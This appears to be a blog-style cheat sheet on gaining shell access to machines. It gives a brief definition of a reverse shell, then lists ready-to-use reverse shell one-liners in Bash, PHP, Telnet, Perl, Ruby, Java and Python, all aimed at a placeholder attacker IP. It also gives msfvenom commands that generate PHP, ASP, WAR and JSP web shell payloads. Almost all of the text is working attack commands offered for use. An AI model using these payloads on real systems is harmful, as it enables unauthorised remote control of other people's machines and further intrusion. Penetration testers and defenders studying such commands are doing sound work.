There is a few types of Shell that we can use to access the machine

  1. Reverse Shell
  2. Web Shell

Disclaimer: All the commands below have not been done by myself but I do some researching on the internet

Reverse Shell


A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the attacker’s host. Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. Reverse shells can also work across a NAT or security system.


Below are the example reverse shell that i can think now:

Bash

bash -i >& /dev/tcp/ip/port 0>&1

PHP

PHP - php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

Telnet

telnet = rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

PERL

PERL = perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

RUBY = ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

JAVA

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


PHP Reverse Shell – php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell · GitHub


Aspx Reverse shell – aspx-reverse-shell/shell.aspx at master · borjmz/aspx-reverse-shell · GitHub


Web-shells


PHP


This php-shell is OS-independent. You can use it on both Linux and Windows.


msfvenom -p php/meterpreter_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.php


ASP


msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f asp > shell.asp


WAR


msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f war > shell.war


JSP


msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.jsp